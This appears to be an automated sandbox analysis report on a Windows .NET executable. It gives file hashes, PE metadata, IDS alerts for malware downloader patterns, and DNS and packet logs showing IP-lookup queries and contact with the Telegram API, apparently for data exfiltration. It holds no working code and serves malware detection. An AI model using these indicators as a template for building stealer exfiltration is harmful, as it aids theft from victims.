Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.0.6.5.0.0.5.9.1.7.1.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.0.6.5.0.1.2.0.1.0.7.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.2.d.4.d.7.b.-.1.2.7.3.-.4.f.c.d.-.b.0.e.6.-.2.9.7.b.8.6.8.d.e.3.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.1.0.f.5.b.-.f.3.a.b.-.4.0.d.b.-.8.c.e.e.-.f.3.d.5.9.0.c.3.7.b.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.z.o.B.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.0.-.0.0.0.1.-.0.0.1.4.-.5.6.8.b.-.6.b.1.4.5.c.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.8.5.0.d.b.9.2.a.1.a.e.a.8.c.8.a.7.b.a.5.a.9.4.0.c.9.f.9.a.b.1.9.c.3.1.c.e.9.a.4.!.f.i.l.e...
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 08:15:00 2024, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):309199
                                                                                                                                                Entropy (8bit):3.9991454966192643
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:UtKg4SB4lxc4uEqsyCLTgo7NWxiy2OMNXUsU0iSxL3qs5:UtKnzc4RywTgZx+uSh
                                                                                                                                                MD5:25896F89B2E070E18D1D0F4407AF5AE8
                                                                                                                                                SHA1:23A217DB9A60C9F2B2FF565078BB2CBCE7044F60
                                                                                                                                                SHA-256:D257D9358B274F1B16D886204E0ABB4318DCAC3FBE6D8AC3D195A853A673208C
                                                                                                                                                SHA-512:8AAE005E7C3D4039983DFBE51A40A53E5B5D239A0015A4267EFDC27EFE43F0D3408ACDF11B8209A867BB79B8286E696B22E33261F907552D8C0CE653EC077AFA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:MDMP..a..... .........sg............D...............X.......$...\$..........~S..........`.......8...........T............4...............$..........l&..............................................................................eJ.......'......GenuineIntel............T.............sg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8386
                                                                                                                                                Entropy (8bit):3.6919066065698254
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:R6l7wVeJkCs6fHfG6Y9RiSU2tXtgmfZDiFprK89bStsf0JGWgVGm:R6lXJQ626Y+SUQXtgmfsrSmf6g9
                                                                                                                                                MD5:7CC450A88FE81FD4FD7ECD931CE63DAA
                                                                                                                                                SHA1:DE5CBA61829D48063DD71B2AFA34DB9DF75B2704
                                                                                                                                                SHA-256:22D1B6438BC78844A30C7CF536D2A2C45BB4FD2D5CBD59208BCF81DB85E12CF1
                                                                                                                                                SHA-512:586C439F05E64B4035563DE8C6A5F8BED853ED0D7FADEEF799220AB4782A475C6B0A239DC4D625821D0DD27E2B4AA06D76E9EE0182DE765F7D5C198E3DAB2502
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.6.8.<./.P.i.
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4711
                                                                                                                                                Entropy (8bit):4.439273745722993
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwWl8zsnNJg77aI9aiFyWpW8VYNnYm8M4JrNn/Fk+q8vnNnkNqDy0PNd:uIjfnI7FF7VC6JAKXm0PNd
                                                                                                                                                MD5:DC23DA1C805FF1A170021C3387E46885
                                                                                                                                                SHA1:29F4DF08B1F5FAA1EF12BAC13EDA4B8762234BF2
                                                                                                                                                SHA-256:5B41BF4E5F21D0FC217E29ABB28622E31AFD5DC3C57CB7B2D1242D6567FD49A7
                                                                                                                                                SHA-512:BF254E706CDDDDE18C230725CDDF546448DDFDDD30CD2D2FFB9454A968998C8E55E18C5CFED4842647BBE95341215FBBE7D3BC60E9C18E5F89A7931120207123
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655157" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1835008
                                                                                                                                                Entropy (8bit):4.465521687600912
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:MIXfpi67eLPU9skLmb0b4SWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbq:xXD94SWlLZMM6YFH1+q
                                                                                                                                                MD5:43F81D79B1E09D3CACC8278957187023
                                                                                                                                                SHA1:0E928BAAC4C136262DB0959C77B6E556A13B2476
                                                                                                                                                SHA-256:3B9E017F0557D4FC8EF231E6DD692D00C4F72180FC0A52C444E141D940A2D50D
                                                                                                                                                SHA-512:7BEC43FB945804EEE00BBBE4AF61F01664DA2CE327FB9523F1567906F49433691028B55A3D532647F5985E06337F859674304D2A32C112F468A583D6859C7682
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.7/.\[................................................................................................................................................................................................................................................................................................................................................8"........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.853097462436567
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:file.exe
                                                                                                                                                File size:759'808 bytes
                                                                                                                                                MD5:3b2a532f5145a1e1a1d04daf8119caf1
                                                                                                                                                SHA1:850db92a1aea8c8a7ba5a940c9f9ab19c31ce9a4
                                                                                                                                                SHA256:49039b4b47513f22a7e396b57a73abe02b0032a09089e8fa68c94c0eae655d6b
                                                                                                                                                SHA512:6d99963c39a895ff0dc6ca306fee30ea97c097320d2cb8718be402414e77e4a2ed542be7b674fe3a354a3523bd5737d0c357621a2af341ad9e78c5cc0e1a337c
                                                                                                                                                SSDEEP:12288:C4doaeP1x88nMuJYvYExLntAtRozVeGv5zW/H+ao1aFzJLrujKw+/ZY:hdFeP1HMEYtLkweY5MLbzJX+D
                                                                                                                                                TLSH:57F412F81E55CE9BDC940B7005B2E3BE62765E9EC402C357CBEDECFB7A1165A1908290
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksg..............0..r...$........... ........@.. ....................................@................................
                                                                                                                                                Icon Hash:53952576d1abd26e
                                                                                                                                                Entrypoint:0x4b900a
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x67734B84 [Tue Dec 31 01:40:20 2024 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add al, byte ptr [eax]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb8fb8 | 0x4f | .text
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x21a0 | .rsrc
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                                                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                                                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                                                                                 .text | 0x2000 | 0xb7030 | 0xb7200 | 20b05148d496e2f908ae278603d2a7fa | False | 0.9311633425767918 | data | 7.859078791569036 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                 .rsrc | 0xba000 | 0x21a0 | 0x2200 | 2f6094046199257534f2c884afeee2e9 | False | 0.8988970588235294 | data | 7.474718512892919 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                 .reloc | 0xbe000 | 0xc | 0x200 | d972e1720e37f81580be2f859a3b5d36 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                                                                                 RT_ICON | 0xba0c8 | 0x1d72 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9698859113823295
                                                                                                                                                 RT_GROUP_ICON | 0xbbe4c | 0x14 | data | | | 1.05
                                                                                                                                                 RT_VERSION | 0xbbe70 | 0x32c | data | | | 0.4642857142857143
                                                                                                                                                 DLL | Import
                                                                                                                                                 mscoree.dll | _CorExeMain
                                                                                                                                                 Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                 2024-12-31T09:15:17.975351+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | TCP
                                                                                                                                                 2024-12-31T09:15:21.694106+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | TCP
                                                                                                                                                 2024-12-31T09:15:22.240634+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49749 | 188.114.96.3 | 443 | TCP
                                                                                                                                                 2024-12-31T09:15:24.194291+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49750 | 193.122.6.168 | 80 | TCP
                                                                                                                                                 2024-12-31T09:15:24.740290+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49751 | 188.114.96.3 | 443 | TCP
                                                                                                                                                 2024-12-31T09:15:28.946869+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
                                                                                                                                                 2024-12-31T09:15:31.946675+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | TCP
                                                                                                                                                 2024-12-31T09:15:36.900479+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49764 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                Dec 31, 2024 09:15:31.793554068 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.946696043 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.946749926 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.946808100 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.947184086 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:31.950520992 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.951661110 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.955506086 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.955564022 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.956490040 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:31.956562996 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.956620932 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:31.961381912 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.092670918 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.098244905 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.098300934 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.098385096 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.098793030 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.098809958 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.147304058 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.570466995 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.581612110 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.581650972 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.720375061 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.720443010 CET44349761188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.720510006 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.725294113 CET49761443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:33.728749990 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.729458094 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.733752966 CET8049760193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.733815908 CET4976080192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.734292984 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:33.734354973 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.734471083 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:33.739260912 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.361457109 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.364228964 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.364288092 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.364360094 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.364593029 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.364608049 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.412919044 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:35.818207026 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.819756985 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.819792986 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.968435049 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.968492985 CET44349763188.114.96.3192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.968586922 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.969039917 CET49763443192.168.2.4188.114.96.3
                                                                                                                                                Dec 31, 2024 09:15:35.984481096 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:35.989397049 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.991081953 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                Dec 31, 2024 09:15:35.992275000 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:35.992352962 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:35.992432117 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:35.992767096 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:35.992800951 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.658248901 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.658360958 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.660093069 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.660123110 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.660367012 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.661731005 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.703330040 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.900489092 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.900552988 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                Dec 31, 2024 09:15:36.900624990 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                Dec 31, 2024 09:15:36.904441118 CET49764443192.168.2.4149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 09:15:01.263828039 CET | 62746 | 53 | 192.168.2.4 | 1.1.1.1
Dec 31, 2024 09:15:01.271559000 CET | 53 | 62746 | 1.1.1.1 | 192.168.2.4
Dec 31, 2024 09:15:17.966434956 CET | 60581 | 53 | 192.168.2.4 | 1.1.1.1
Dec 31, 2024 09:15:17.973577023 CET | 53 | 60581 | 1.1.1.1 | 192.168.2.4
Dec 31, 2024 09:15:35.984405041 CET | 54823 | 53 | 192.168.2.4 | 1.1.1.1
Dec 31, 2024 09:15:35.991019011 CET | 53 | 54823 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 09:15:01.263828039 CET | 192.168.2.4 | 1.1.1.1 | 0x99b7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:17.966434956 CET | 192.168.2.4 | 1.1.1.1 | 0xc2c | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:35.984405041 CET | 192.168.2.4 | 1.1.1.1 | 0x561a | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 09:15:01.271559000 CET | 1.1.1.1 | 192.168.2.4 | 0x99b7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 09:15:01.271559000 CET | 1.1.1.1 | 192.168.2.4 | 0x99b7 | No error (0) | checkip.dyndns.com | (none) | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:01.271559000 CET | 1.1.1.1 | 192.168.2.4 | 0x99b7 | No error (0) | checkip.dyndns.com | (none) | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:01.271559000 CET | 1.1.1.1 | 192.168.2.4 | 0x99b7 | No error (0) | checkip.dyndns.com | (none) | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:01.271559000 CET | 1.1.1.1 | 192.168.2.4 | 0x99b7 | No error (0) | checkip.dyndns.com | (none) | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:01.271559000 CET | 1.1.1.1 | 192.168.2.4 | 0x99b7 | No error (0) | checkip.dyndns.com | (none) | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:17.973577023 CET | 1.1.1.1 | 192.168.2.4 | 0xc2c | No error (0) | reallyfreegeoip.org | (none) | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:17.973577023 CET | 1.1.1.1 | 192.168.2.4 | 0xc2c | No error (0) | reallyfreegeoip.org | (none) | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:15:35.991019011 CET | 1.1.1.1 | 192.168.2.4 | 0x561a | No error (0) | api.telegram.org | (none) | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Dec 31, 2024 09:15:01.294137001 CET | 151 | OUT | GET / HTTP/1.1
